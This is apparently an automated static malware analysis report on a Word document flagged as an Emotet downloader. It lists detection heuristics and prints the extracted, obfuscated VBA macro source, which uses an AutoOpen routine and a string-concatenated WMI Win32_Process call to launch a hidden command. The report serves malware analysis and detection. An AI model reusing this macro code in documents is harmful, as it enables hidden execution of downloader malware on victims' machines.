Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0601a07c6c366ba5…

MALICIOUS

Office (OLE)

Size: 102.9 KB
Created: 2019-05-07 10:12:00
Authoring application: Microsoft Office Word
First seen: 2021-01-23
MD5: 6fcb0861ce38fdaa75f76e01870c547a
SHA-1: 223261fe8b9dc61191b2be6cac87ab5c5d9e8893
SHA-256: 0601a07c6c366ba5bb64c7c9eb7b699fbed121e8fb46ba45f27fbbd0626ad9d4
Risk Score: 210

Heuristics 7

  • ClamAV: Doc.Downloader.Emotet-6964647-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6964647-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
    Matched line in script
    Set G5633975 = D14061(GetObject("winmgmt" _
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set G5633975 = D14061(GetObject("winmgmt" _
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    autoopen()
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5093 bytes
SHA-256: c3bd8705570cfe60c9ef7b57347b3ac54b9f3dffd27e268ab3322f0b01349bcc
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "b1720618"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "w1578953"
Attribute VB_Base = "0{C1A5688F-8A34-49B0-8F55-EFF4989335E6}{FDAD0313-DC72-4D8D-8329-E9DB31704FB0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "E22014"

Attribute VB_Name = "D8773492"

Attribute VB_Name = "A580701"

Attribute VB_Name = "o_8234"

Attribute VB_Name = "A27379"
Attribute VB_Base = "0{F37157B9-92D7-41B0-BE30-F0B26FE70DA9}{B38EA070-32C4-4A7B-8DA2-156978FE509A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "T_4460"
Function D14061(W7471584)
         While b844381_ And s0130958
'Y569_00E62_464c800410G802_90
      Wend
         While a05_90 And m9_446_1
'w59_966M01__83_J_60987Z6044669
      Wend
         While w3_85_ And j230273
'F4502230W4881749G615384Y59272_
      Wend
Set D14061 = CVar(W7471584)
         While n7700522 And H668505
'T57_8915X808160h067184A77_80
      Wend
         While B36304 And M608_92
'q0_54_o4056579X2099243i04190
      Wend
End Function
Sub _
autoopen()
On Error Resume Next
         While f42799 And L7704099
'w254697c01847_k4823_08l424_2
      Wend
         While z0679462 And S458956
'h02504_p213892m4346364k50024
      Wend
         While K680621_ And U_7399
'Q39211L0620631H761671A5188101
      Wend
Call U2939849
         While V24_38 And l_53838
'V27225L92014_N04__279w485_0
      Wend
         While w29_804 And Z0320_2
'z43877Y1834991U4645895w82878
      Wend
         While l43461 And j874849
'B199761w3__27D2__8649f5179_75
      Wend
End Sub


Attribute VB_Name = "Y0498310"
Function U2939849()
On Error Resume Next
         While B31857 And Z36_1091
'P32532q598634a466103S71186
      Wend
         While R13623_1 And A371943
'l2___683K335660v7758237v98698
      Wend
         While I61794 And c42461
'V630213j492_92i_000740b4119_
      Wend
p206810 = w1578953.q64548 + A27379.A12063 + w1578953.q64548.ControlTipText + A27379.S0817563 + w1578953.q64548.PasswordChar + w1578953.q64548.PasswordChar + A27379.Z64636 + w1578953.q64548 + w1578953.q64548 + A27379.P5218__ + w1578953.q64548.ControlTipText + A27379.I0_71767 + w1578953.q64548.ControlTipText
         While l_0568 And R44923_
'a64_551j18718A049625F431446
      Wend
         While Z8631279 And t1259084
'B25_5323j__2521c20510d708298
      Wend
         While c_61158 And f906094
'r06871z776893u_72221K8_948
      Wend
Set G5633975 = D14061(GetObject("winmgmt" _
+ "s:Wi" + "n3" _
+ "2_Pr" _
+ "ocess"))
         While D326073 And L24085
'K143790Q6256_29C83_624j55_227
      Wend
         While M09705 And d801881_
'U__9248_h149_27Y23820X74_678
      Wend
G5633975.Create X85006 + p206810 + c51171, O924005_, T54591, j735779
         While X3_067_ And j9_5696
'b16603M59_7932j_09630O78902_4
      Wend
         While T61109_1 And d02334
'X99512_W56_2_Y830942b98324
      Wend
         While p65608 And j_36__78
'o0_0971d446_507r6461317z62707
      Wend
End Function


Attribute VB_Name = "T9365707"

Public Function T54591()
         While F76090 And w044579
'w43028D86__94S14822L6109_52
      Wend
         While I41891 And E880_46
'R342908J9159_49V7_2266j2__029
      Wend
         While B44_493 And V770134_
's06956_4Z58414__v480_19_h126886
      Wend
Set T54591 = D14061(GetObject("winmgmt" _
+ "s:Wi" + "n3" + "2_Pr" _
+ "ocess" + "S" + "tartup"))
         While X913926 And T11742
'M3078876F34_055Q08158r79_70
      Wend
         While G94793 And o9582444
'c5651770f_5479k8906914p3_14807
      Wend
         While N1721770 And w13454
'M205058E1_71870M54431_1P3773381
      Wend
w6638_21 = vbError - vbError
         While s364__04 And d963075
'w661553_o_0213W3086_16o00785
      Wend
         While k5942525 And q3414672
'r446562K8_4910B4254219C_982415
      Wend
With T54591
         While u_1484 And c0_42505
'J79709i9442864q29524X1__7972
      Wend
         While Q38089 And P80132
'I586617o4851_G430_3N650930
      Wend
         While z2_8__88 And t575005
'R31_68Z05444q18_71F166953
      Wend
. _
ShowWindow = w6638_21 + w6638_21 + w6638_21 + w6638_21 + w6638_21 + w6638_21 + w6638_21
         While v70865_9 And E2274_
'W32186o_04193j427380m785359
      Wend
         While p73133 And M5_85_9_
'r440498q17243S3855771Z07_6430
      Wend
End With
         While X72205 And U81453
'H41_917h123359w5403433u149744
      Wend
         While B131305 And T035_41
'W9752_96w4488_z1152769u5626339
      Wend
End Function